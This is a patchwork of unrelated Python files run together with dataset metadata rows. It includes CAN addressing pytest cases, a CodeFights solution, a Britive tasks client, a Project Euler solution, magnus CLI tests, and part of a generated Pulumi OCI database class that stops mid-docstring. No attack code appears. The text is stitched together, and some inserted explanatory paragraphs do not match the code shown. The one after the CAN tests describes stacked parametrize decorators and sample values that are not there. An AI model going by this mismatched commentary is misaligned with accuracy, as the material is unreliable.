# validate_ai
@pytest.mark.parametrize("kwargs", [
# Normal 11 bit
{"addressing_format": CanAddressingFormat.NORMAL_11BIT_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"can_id": 0x620},
{"addressing_format": CanAddressingFormat.NORMAL_11BIT_ADDRESSING,
"addressing_type": AddressingType.FUNCTIONAL,
"can_id": 0x7FF},
# Normal Fixed
{"addressing_format": CanAddressingFormat.NORMAL_FIXED_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"can_id": 0x18DA1234},
{"addressing_format": CanAddressingFormat.NORMAL_FIXED_ADDRESSING,
"addressing_type": AddressingType.FUNCTIONAL,
"can_id": 0x18DBB0C2},
{"addressing_format": CanAddressingFormat.NORMAL_FIXED_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"target_address": 0xB0,
"source_address": 0xC2},
# Extended
{"addressing_format": CanAddressingFormat.EXTENDED_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"can_id": 0x645,
"target_address": 0xE3},
{"addressing_format": CanAddressingFormat.EXTENDED_ADDRESSING,
"addressing_type": AddressingType.FUNCTIONAL,
"can_id": 0x1A654321,
"target_address": 0xFF},
# Mixed 11bit
{"addressing_format": CanAddressingFormat.MIXED_11BIT_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"can_id": 0x7F3,
"address_extension": 0x0B},
{"addressing_format": CanAddressingFormat.MIXED_11BIT_ADDRESSING,
"addressing_type": AddressingType.FUNCTIONAL,
"can_id": 0x60A,
"address_extension": 0xD9},
# Mixed 29bit
{"addressing_format": CanAddressingFormat.MIXED_29BIT_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"can_id": 0x18CEE009,
"address_extension": 0x9A},
{"addressing_format": CanAddressingFormat.MIXED_29BIT_ADDRESSING,
"addressing_type": AddressingType.FUNCTIONAL,
"can_id": 0x18CDE009,
"address_extension": 0x9A},
{"addressing_format": CanAddressingFormat.MIXED_29BIT_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"can_id": 0x18CE918B,
"target_address": 0x91,
"source_address": 0x8B,
"address_extension": 0xD9},
{"addressing_format": CanAddressingFormat.MIXED_29BIT_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"target_address": 0x91,
"source_address": 0x8B,
"address_extension": 0xD9},
])
def test_validate_ai__valid(self, kwargs):
assert CanAddressingInformationHandler.validate_ai(**kwargs) is None
@pytest.mark.parametrize("kwargs", [
# Normal 11 bit
{"addressing_format": CanAddressingFormat.NORMAL_11BIT_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"can_id": 0x620,
"target_address": 0x9F},
{"addressing_format": CanAddressingFormat.NORMAL_11BIT_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"can_id": 0x620,
"source_address": 0x9F},
# Normal Fixed
{"addressing_format": CanAddressingFormat.NORMAL_FIXED_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"can_id": 0x18DB1234},
{"addressing_format": CanAddressingFormat.NORMAL_FIXED_ADDRESSING,
"addressing_type": AddressingType.FUNCTIONAL,
"can_id": 0x18DAB0C2},
{"addressing_format": CanAddressingFormat.NORMAL_FIXED_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"target_address": 0xB0},
{"addressing_format": CanAddressingFormat.NORMAL_FIXED_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"target_address": 0xB0,
"source_address": 0xC2,
"address_extension": 0xD9},
# Extended
{"addressing_format": CanAddressingFormat.EXTENDED_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"can_id": 0x645,
"address_extension": 0x01},
{"addressing_format": CanAddressingFormat.MIXED_11BIT_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"can_id": 0x7F3,
"target_address": 0x0B},
# Mixed 29bit
{"addressing_format": CanAddressingFormat.MIXED_29BIT_ADDRESSING,
"addressing_type": AddressingType.FUNCTIONAL,
"can_id": 0x18CEE009,
"address_extension": 0x9A},
{"addressing_format": CanAddressingFormat.MIXED_29BIT_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"can_id": 0x18CDE009,
"address_extension": 0x9A},
{"addressing_format": CanAddressingFormat.MIXED_29BIT_ADDRESSING,
"addressing_type": AddressingType.FUNCTIONAL,
"can_id": 0x18CDE009},
])
def test_validate_ai__invalid(self, kwargs):
with pytest.raises((ValueError, TypeError)):
CanAddressingInformationHandler.validate_ai(**kwargs)
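The test methods above stack several `@pytest.mark.parametrize` decorators; pytest expands stacked decorators into one generated test case per combination of the parameter sets (the Cartesian product). A minimal self-contained illustration of that expansion, reusing sample values from the tests above:

```python
import itertools

# Two stacked parameter sets, as used in the tests above.
addressing_types = ["some addressing type", "PHYSICAL"]
address_extensions = ["some AE", 0x5B]

# Stacked @pytest.mark.parametrize decorators expand to the cross product:
# one generated test per (addressing_type, address_extension) pair.
cases = list(itertools.product(addressing_types, address_extensions))
print(len(cases))  # 2 * 2 = 4 generated test cases
```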
# File: Codefights/arcade/python-arcade/level-2/15.Feedback-Review/Python/solution1.py
# Repo: RevansChen/online-judge (MIT license)
# 有限制修改區域
import textwrap
def feedbackReview(feedback, size):
return textwrap.wrap(feedback, size)
| 14.375 | 40 | 0.756522 | 13 | 115 | 6.692308 | 0.769231 | 0.275862 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010309 | 0.156522 | 115 | 7 | 41 | 16.428571 | 0.886598 | 0.130435 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
413ee030a8d17329119cf7d0b4182484cea57c06 | 6,393 | py | Python | src/britive/tasks.py | britive/python-api | 2daa7693f1d4adf03626abd78598e30f62b6e2e6 | [
"MIT"
] | null | null | null | src/britive/tasks.py | britive/python-api | 2daa7693f1d4adf03626abd78598e30f62b6e2e6 | [
"MIT"
] | null | null | null | src/britive/tasks.py | britive/python-api | 2daa7693f1d4adf03626abd78598e30f62b6e2e6 | [
"MIT"
] | null | null | null |
class Tasks:
def __init__(self, britive):
self.britive = britive
self.base_url = f'{self.britive.base_url}/tasks'
def list(self, task_service_id: str) -> list:
"""
Return a list of tasks for the given `task_service_id`.
Make a call to `britive.task_services.get()` to obtain the appropriate `task_service_id`.
:param task_service_id: The ID of the task service.
:return: List of tasks.
"""
return self.britive.get(f'{self.base_url}/services/{task_service_id}/tasks')
def get(self, task_service_id: str, task_id: str) -> dict:
"""
Return details of a task.
Make a call to `britive.task_services.get()` to obtain the appropriate `task_service_id`.
:param task_service_id: The ID of the task service.
:param task_id: The ID of the task.
:return: Details of the task.
"""
return self.britive.get(f'{self.base_url}/services/{task_service_id}/tasks/{task_id}')[0]
def create(self, task_service_id: str, name: str, properties: dict, frequency_type: str, start_time: str = None,
frequency_interval: str = None) -> dict:
"""
Create a new task.
Make a call to `britive.task_services.get()` to obtain the appropriate `task_service_id`.
:param task_service_id: The ID of the task service.
:param name: The name of the task.
:param properties: This parameter is dependent on the task service type. Currently only `environmentScanner` is
supported. Below are details about how to properly set this parameter for `environmentScanner`.
* appId: this is the appContainerId of the app to be scanned.
* scope: This is a list of scopes. Each scope can be of type EnvironmentGroup or Environment.
* orgScan: Boolean indicating whether an org scan must be done or not.
{
"appId": "app-id",
"scope": [
{
"type": "EnvironmentGroup"|"Environment",
"value": "ID"
}
],
"orgScan": true|false
}
:param frequency_type: Valid values are Daily, Weekly, Monthly, Hourly (start_time is implicitly the next hour).
:param start_time: The start time of the task in GMT. Only applies to Daily, Weekly, and Monthly
frequency types. Example: `12:00`.
:param frequency_interval: Only applies to Weekly, Monthly, and Hourly frequency types.
* Weekly: possible values are 1-7, which is Mon-Sun, respectively.
* Monthly: possible values are from 1-31.
* Hourly: possible values are 1-23.
:return: Details of the newly created task.
"""
data = {
'name': name,
'startTime': start_time,
'frequencyType': frequency_type,
'frequencyInterval': frequency_interval,
'properties': properties
}
return self.britive.post(f'{self.base_url}/services/{task_service_id}/tasks', json=data)
def statuses(self, task_service_id: str, task_id: str) -> list:
"""
Return a list of task statuses ordered by `sentTime` (part of the response) desc.
:param task_service_id: The ID of the task service.
:param task_id: The ID of the task.
:return: List of task statuses.
"""
return self.britive.get(f'{self.base_url}/services/{task_service_id}/tasks/{task_id}/statuses')
def update(self, task_service_id: str, task_id: str, name: str = None, properties: dict = None,
frequency_type: str = None, start_time: str = None, frequency_interval: str = None) -> dict:
"""
Updates a task.
Only provide parameters that should be updated.
Make a call to `britive.task_services.get()` to obtain the appropriate `task_service_id`.
:param task_service_id: The ID of the task service.
:param task_id: The ID of the task.
:param name: The name of the task.
:param properties: This parameter is dependent on the task service type. Currently only `environmentScanner` is
supported. Below are details about how to properly set this parameter for `environmentScanner`.
* appId: this is the appContainerId of the app to be scanned.
* scope: This is a list of scopes. Each scope can be of type EnvironmentGroup or Environment.
* orgScan: Boolean indicating whether an org scan must be done or not.
{
"appId": "app-id",
"scope": [
{
"type": "EnvironmentGroup"|"Environment",
"value": "ID"
}
],
"orgScan": true|false
}
:param frequency_type: Valid values are Daily, Weekly, Monthly, Hourly (start_time is implicitly the next hour).
:param start_time: The start time of the task in GMT. Only applies to Daily, Weekly, and Monthly
frequency types. Example: `12:00`.
:param frequency_interval: Only applies to Weekly, Monthly, and Hourly frequency types.
* Weekly: possible values are 1-7, which is Mon-Sun, respectively.
* Monthly: possible values are from 1-31.
* Hourly: possible values are 1-23.
:return: Details of the newly created task.
"""
# construct the dict assuming every parameter is present
raw_data = {
'name': name,
'startTime': start_time,
'frequencyType': frequency_type,
'frequencyInterval': frequency_interval,
'properties': properties
}
# and now remove any None values
data = {k: v for k, v in raw_data.items() if v is not None}
return self.britive.patch(f'{self.base_url}/services/{task_service_id}/tasks/{task_id}', json=data)
def delete(self, task_service_id: str, task_id: str) -> None:
"""
Delete a task.
:param task_service_id: The ID of the task service.
:param task_id: The ID of the task.
:return: None
"""
return self.britive.delete(f'{self.base_url}/services/{task_service_id}/tasks/{task_id}')
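The `update` method above assembles `raw_data` from every parameter and then strips the `None` entries, so that only explicitly supplied fields reach the PATCH request. A minimal standalone sketch of that pruning step (the sample payload values are illustrative, not real task fields beyond those shown above):

```python
def prune_none(payload: dict) -> dict:
    # Keep only keys whose value was actually supplied, mirroring update() above.
    return {k: v for k, v in payload.items() if v is not None}

data = prune_none({
    "name": "nightly-scan",   # illustrative value
    "startTime": None,        # not supplied, so omitted from the request body
    "frequencyType": "Daily",
})
print(data)
```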
# File: p0008.py
# Repo: bossm0n5t3r/project-euler-solutions (MIT license)
] | null | null | null | # Solution to Project Euler Problem 8
NUMBER = "7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450"
ADJACENT = 13
def sol():
ans = max(digit_product(NUMBER[i : i + ADJACENT]) for i in range(len(NUMBER) - ADJACENT + 1))
return str(ans)
def digit_product(s):
result = 1
for c in s:
result *= int(c)
return result
if __name__ == "__main__":
print(sol())
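`digit_product` multiplies the decimal digits of a substring, and `sol` takes the maximum of that product over every window of `ADJACENT` consecutive digits. A quick standalone check of the digit product on a short window (the sample strings are illustrative):

```python
def digit_product(s: str) -> int:
    # Multiply every decimal digit in the string, as in the solution above.
    result = 1
    for c in s:
        result *= int(c)
    return result

print(digit_product("9989"))  # 9 * 9 * 8 * 9 = 5832
```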
# File: tests/magnus/test_cli.py
# Repo: project-magnus/magnus-core (Apache-2.0 license)
] | null | null | null | import pytest
from magnus import cli
def test_init_prints_help_if_command_is_not_recognised(mocker, monkeypatch):
mock_argparse = mocker.MagicMock()
monkeypatch.setattr(cli, 'argparse', mock_argparse)
monkeypatch.setattr(cli.sys, 'argv', ['magnus', 'command_to_run'])
mock_parser = mocker.MagicMock()
mock_argparse.ArgumentParser.return_value = mock_parser
mock_command = mocker.MagicMock()
mock_parser.parse_args.return_value = mock_command
mock_command.command = 'command_to_run'
mock_help = mocker.MagicMock()
mock_parser.print_help = mock_help
with pytest.raises(SystemExit):
cli.MagnusCLI()
assert mock_help.call_count == 1
def test_init_calls_the_method_if_command_recognised(mocker, monkeypatch):
mock_argparse = mocker.MagicMock()
monkeypatch.setattr(cli, 'argparse', mock_argparse)
monkeypatch.setattr(cli.sys, 'argv', ['magnus', 'command_to_run'])
mock_parser = mocker.MagicMock()
mock_argparse.ArgumentParser.return_value = mock_parser
mock_command = mocker.MagicMock()
mock_parser.parse_args.return_value = mock_command
mock_command.command = 'dummy_function'
mock_function = mocker.MagicMock()
cli.MagnusCLI.dummy_function = mock_function
cli.MagnusCLI()
assert mock_function.call_count == 1
def test_execute_calls_pipeline_execute_with_right_variables(monkeypatch, mocker):
mock_argparse = mocker.MagicMock()
monkeypatch.setattr(cli, 'argparse', mock_argparse)
mock_resolve_args = mocker.MagicMock()
monkeypatch.setattr(cli.MagnusCLI, '_resolve_args', mock_resolve_args)
monkeypatch.setattr(cli.MagnusCLI, '__init__', mocker.MagicMock(return_value=None))
mock_pipeline_execute = mocker.MagicMock()
monkeypatch.setattr(cli.pipeline, 'execute', mock_pipeline_execute)
mock_args = mocker.MagicMock()
mock_args.use_cached = False
mock_args.run_id = 'some_run_id'
mock_args.var_file = 'variables_file'
mock_args.file = 'pipeline_file'
mock_args.tag = 'tag'
mock_args.config_file = 'configuration_file'
mock_args.log_level = 0
mock_resolve_args.return_value = mock_args, {'a': 1}
magnus_cli = cli.MagnusCLI()
magnus_cli.execute()
mock_pipeline_execute.assert_called_once_with(
variables_file='variables_file', pipeline_file='pipeline_file',
tag='tag', run_id='some_run_id', configuration_file='configuration_file',
use_cached=False, a=1)
def test_execute_calls_pipeline_execute_single_node_with_right_variables(monkeypatch, mocker):
mock_argparse = mocker.MagicMock()
monkeypatch.setattr(cli, 'argparse', mock_argparse)
mock_resolve_args = mocker.MagicMock()
monkeypatch.setattr(cli.MagnusCLI, '_resolve_args', mock_resolve_args)
monkeypatch.setattr(cli.MagnusCLI, '__init__', mocker.MagicMock(return_value=None))
mock_pipeline_execute = mocker.MagicMock()
monkeypatch.setattr(cli.pipeline, 'execute_single_node', mock_pipeline_execute)
mock_args = mocker.MagicMock()
mock_args.step_name = 'step_name'
mock_args.run_id = 'some_run_id'
mock_args.var_file = 'variables_file'
mock_args.file = 'pipeline_file'
mock_args.tag = 'tag'
mock_args.map_variable = {}
mock_args.config_file = 'configuration_file'
mock_args.log_level = 0
mock_resolve_args.return_value = mock_args, {'a': 1}
magnus_cli = cli.MagnusCLI()
magnus_cli.execute_single_node()
mock_pipeline_execute.assert_called_once_with(
variables_file='variables_file', pipeline_file='pipeline_file',
step_name='step_name', map_variable={}, configuration_file='configuration_file',
tag='tag', run_id='some_run_id',
a=1)
def test_execute_calls_pipeline_execute_single_branch_with_right_variables(monkeypatch, mocker):
mock_argparse = mocker.MagicMock()
monkeypatch.setattr(cli, 'argparse', mock_argparse)
mock_resolve_args = mocker.MagicMock()
monkeypatch.setattr(cli.MagnusCLI, '_resolve_args', mock_resolve_args)
monkeypatch.setattr(cli.MagnusCLI, '__init__', mocker.MagicMock(return_value=None))
mock_pipeline_execute = mocker.MagicMock()
monkeypatch.setattr(cli.pipeline, 'execute_single_branch', mock_pipeline_execute)
mock_args = mocker.MagicMock()
mock_args.branch_name = 'branch_name'
mock_args.run_id = 'some_run_id'
mock_args.var_file = 'variables_file'
mock_args.file = 'pipeline_file'
mock_args.tag = 'tag'
mock_args.map_variable = {}
mock_args.config_file = 'configuration_file'
mock_args.log_level = 0
mock_resolve_args.return_value = mock_args, {'a': 1}
magnus_cli = cli.MagnusCLI()
magnus_cli.execute_single_branch()
mock_pipeline_execute.assert_called_once_with(
variables_file='variables_file', pipeline_file='pipeline_file',
branch_name='branch_name', map_variable={}, configuration_file='configuration_file',
tag='tag', run_id='some_run_id',
a=1)
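Each test above follows the same arrange/act/assert shape: patch a collaborator with a `MagicMock`, drive the code under test, then verify the mock's recorded calls. A self-contained miniature of that pattern (the `Greeter` class is hypothetical, used only to illustrate the technique):

```python
from unittest import mock

class Greeter:
    # Tiny stand-in for an object whose collaborator gets patched in a test.
    def __init__(self, formatter):
        self.formatter = formatter

    def greet(self, name):
        return self.formatter(name)

mock_formatter = mock.MagicMock(return_value="HI")
greeter = Greeter(mock_formatter)

result = greeter.greet("hi")
mock_formatter.assert_called_once_with("hi")  # verify the recorded call
print(result)
```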
# File: sdk/python/pulumi_oci/database/autonomous_database.py
# Repo: EladGabay/pulumi-oci (ECL-2.0 / Apache-2.0 licenses)
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['AutonomousDatabaseArgs', 'AutonomousDatabase']
@pulumi.input_type
class AutonomousDatabaseArgs:
def __init__(__self__, *,
compartment_id: pulumi.Input[str],
db_name: pulumi.Input[str],
admin_password: Optional[pulumi.Input[str]] = None,
are_primary_whitelisted_ips_used: Optional[pulumi.Input[bool]] = None,
autonomous_container_database_id: Optional[pulumi.Input[str]] = None,
autonomous_database_backup_id: Optional[pulumi.Input[str]] = None,
autonomous_database_id: Optional[pulumi.Input[str]] = None,
autonomous_maintenance_schedule_type: Optional[pulumi.Input[str]] = None,
clone_type: Optional[pulumi.Input[str]] = None,
cpu_core_count: Optional[pulumi.Input[int]] = None,
customer_contacts: Optional[pulumi.Input[Sequence[pulumi.Input['AutonomousDatabaseCustomerContactArgs']]]] = None,
data_safe_status: Optional[pulumi.Input[str]] = None,
data_storage_size_in_gb: Optional[pulumi.Input[int]] = None,
data_storage_size_in_tbs: Optional[pulumi.Input[int]] = None,
db_version: Optional[pulumi.Input[str]] = None,
db_workload: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
is_access_control_enabled: Optional[pulumi.Input[bool]] = None,
is_auto_scaling_enabled: Optional[pulumi.Input[bool]] = None,
is_data_guard_enabled: Optional[pulumi.Input[bool]] = None,
is_dedicated: Optional[pulumi.Input[bool]] = None,
is_free_tier: Optional[pulumi.Input[bool]] = None,
is_preview_version_with_service_terms_accepted: Optional[pulumi.Input[bool]] = None,
is_refreshable_clone: Optional[pulumi.Input[bool]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
license_model: Optional[pulumi.Input[str]] = None,
nsg_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ocpu_count: Optional[pulumi.Input[float]] = None,
open_mode: Optional[pulumi.Input[str]] = None,
operations_insights_status: Optional[pulumi.Input[str]] = None,
permission_level: Optional[pulumi.Input[str]] = None,
private_endpoint_label: Optional[pulumi.Input[str]] = None,
refreshable_mode: Optional[pulumi.Input[str]] = None,
rotate_key_trigger: Optional[pulumi.Input[bool]] = None,
source: Optional[pulumi.Input[str]] = None,
source_id: Optional[pulumi.Input[str]] = None,
standby_whitelisted_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
state: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
switchover_to: Optional[pulumi.Input[str]] = None,
timestamp: Optional[pulumi.Input[str]] = None,
vault_id: Optional[pulumi.Input[str]] = None,
whitelisted_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing an AutonomousDatabase resource.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment of the Autonomous Database.
:param pulumi.Input[str] db_name: The database name. The name must begin with an alphabetic character and can contain a maximum of 14 alphanumeric characters. Special characters are not permitted. The database name must be unique in the tenancy.
:param pulumi.Input[str] admin_password: (Updatable) The password must be between 12 and 30 characters long, and must contain at least 1 uppercase, 1 lowercase, and 1 numeric character. It cannot contain the double quote symbol (") or the username "admin", regardless of casing. The password is mandatory if source value is "BACKUP_FROM_ID", "BACKUP_FROM_TIMESTAMP", "DATABASE" or "NONE".
:param pulumi.Input[bool] are_primary_whitelisted_ips_used: (Updatable) This field is null if the Autonomous Database is not Data Guard enabled or Access Control is disabled. Its value is `TRUE` if the Autonomous Database is Data Guard enabled, Access Control is enabled, and the Autonomous Database uses the primary's IP access control list (ACL) for the standby. Its value is `FALSE` if the Autonomous Database is Data Guard enabled, Access Control is enabled, and the Autonomous Database uses a different IP access control list (ACL) for the standby than for the primary.
:param pulumi.Input[str] autonomous_container_database_id: The Autonomous Container Database [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
:param pulumi.Input[str] autonomous_database_backup_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database Backup that you will clone to create a new Autonomous Database.
:param pulumi.Input[str] autonomous_database_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
:param pulumi.Input[str] autonomous_maintenance_schedule_type: The maintenance schedule type of the Autonomous Database on shared Exadata infrastructure. The EARLY maintenance schedule applies patches prior to the REGULAR schedule. The REGULAR maintenance schedule follows the normal cycle.
:param pulumi.Input[str] clone_type: The Autonomous Database clone type.
:param pulumi.Input[int] cpu_core_count: (Updatable) The number of OCPU cores to be made available to the database. For Autonomous Databases on dedicated Exadata infrastructure, the maximum number of cores is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
:param pulumi.Input[Sequence[pulumi.Input['AutonomousDatabaseCustomerContactArgs']]] customer_contacts: (Updatable) Customer Contacts.
:param pulumi.Input[str] data_safe_status: (Updatable) Status of the Data Safe registration for this Autonomous Database. Could be REGISTERED or NOT_REGISTERED.
:param pulumi.Input[int] data_storage_size_in_gb: (Updatable) The size, in gigabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. The maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
:param pulumi.Input[int] data_storage_size_in_tbs: (Updatable) The size, in terabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. For Autonomous Databases on dedicated Exadata infrastructure, the maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
:param pulumi.Input[str] db_version: (Updatable) A valid Oracle Database version for Autonomous Database. The `db_workload` values AJD and APEX are only supported for `db_version` `19c` and later.
:param pulumi.Input[str] db_workload: (Updatable) The Autonomous Database workload type. The following values are valid:
* OLTP - indicates an Autonomous Transaction Processing database
* DW - indicates an Autonomous Data Warehouse database
* AJD - indicates an Autonomous JSON Database
* APEX - indicates an Autonomous Database with the Oracle APEX Application Development workload type. Note: `db_workload` can only be updated from AJD to OLTP, or from a free OLTP to AJD.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
:param pulumi.Input[str] display_name: (Updatable) The user-friendly name for the Autonomous Database. The name does not have to be unique.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[bool] is_access_control_enabled: (Updatable) Indicates if the database-level access control is enabled. If disabled, database access is defined by the network security rules. If enabled, database access is restricted to the IP addresses defined by the rules specified with the `whitelistedIps` property. While specifying `whitelistedIps` rules is optional, if database-level access control is enabled and no rules are specified, the database will become inaccessible. The rules can be added later using the `UpdateAutonomousDatabase` API operation or edit option in console. When creating a database clone, the desired access control setting should be specified. By default, database-level access control will be disabled for the clone.
:param pulumi.Input[bool] is_auto_scaling_enabled: (Updatable) Indicates if auto scaling is enabled for the Autonomous Database OCPU core count. The default value is `FALSE`.
:param pulumi.Input[bool] is_data_guard_enabled: (Updatable) Indicates whether the Autonomous Database has Data Guard enabled.
:param pulumi.Input[bool] is_dedicated: True if the database is on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm).
:param pulumi.Input[bool] is_free_tier: (Updatable) Indicates if this is an Always Free resource. The default value is false. Note that Always Free Autonomous Databases have 1 CPU and 20GB of memory. For Always Free databases, memory and CPU cannot be scaled. When `db_workload` is `AJD` or `APEX` it cannot be `true`.
:param pulumi.Input[bool] is_preview_version_with_service_terms_accepted: If set to `TRUE`, indicates that an Autonomous Database preview version is being provisioned, and that the preview version's terms of service have been accepted. Note that preview version software is only available for databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI).
:param pulumi.Input[bool] is_refreshable_clone: (Updatable) True to create a refreshable clone; False to detach the clone from the source Autonomous Database. Detaching is a one-time operation, after which the clone becomes a regular Autonomous Database.
:param pulumi.Input[str] kms_key_id: The OCID of the key container that is used as the master encryption key in database transparent data encryption (TDE) operations.
:param pulumi.Input[str] license_model: (Updatable) The Oracle license model that applies to the Oracle Autonomous Database. Bring your own license (BYOL) allows you to apply your current on-premises Oracle software licenses to equivalent, highly automated Oracle PaaS and IaaS services in the cloud. License Included allows you to subscribe to new Oracle Database software licenses and the Database service. Note that when provisioning an Autonomous Database on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm), this attribute must be null because the attribute is already set at the Autonomous Exadata Infrastructure level. When using [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI), if a value is not specified, the system will supply the value of `BRING_YOUR_OWN_LICENSE`. It is a required field when `db_workload` is AJD and needs to be set to `LICENSE_INCLUDED` as AJD does not support default `license_model` value `BRING_YOUR_OWN_LICENSE`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] nsg_ids: (Updatable) A list of the [OCIDs](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the network security groups (NSGs) that this resource belongs to. Setting this to an empty array after the list is created removes the resource from all NSGs. For more information about NSGs, see [Security Rules](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/securityrules.htm). **NsgIds restrictions:**
* Autonomous Databases with private access require at least 1 Network Security Group (NSG). The nsgIds array cannot be empty.
:param pulumi.Input[float] ocpu_count: (Updatable) The number of OCPU cores to be made available to the database.
:param pulumi.Input[str] open_mode: The `DATABASE OPEN` mode. You can open the database in `READ_ONLY` or `READ_WRITE` mode.
:param pulumi.Input[str] operations_insights_status: Status of Operations Insights for this Autonomous Database.
:param pulumi.Input[str] permission_level: The Autonomous Database permission level. Restricted mode allows access only to admin users.
:param pulumi.Input[str] private_endpoint_label: (Updatable) The private endpoint label for the resource.
:param pulumi.Input[str] refreshable_mode: (Updatable) The refresh mode of the clone. AUTOMATIC indicates that the clone is automatically being refreshed with data from the source Autonomous Database.
:param pulumi.Input[bool] rotate_key_trigger: (Updatable) An optional property that, when toggled, triggers rotation of the KMS key. It applies only to dedicated databases, i.e. where `is_dedicated` is true.
:param pulumi.Input[str] source: The source of the database: Use `NONE` for creating a new Autonomous Database. Use `DATABASE` for creating a new Autonomous Database by cloning an existing Autonomous Database.
:param pulumi.Input[str] source_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
:param pulumi.Input[Sequence[pulumi.Input[str]]] standby_whitelisted_ips: (Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
:param pulumi.Input[str] state: (Updatable) The current state of the Autonomous Database. Can be set to AVAILABLE or STOPPED.
:param pulumi.Input[str] subnet_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet the resource is associated with.
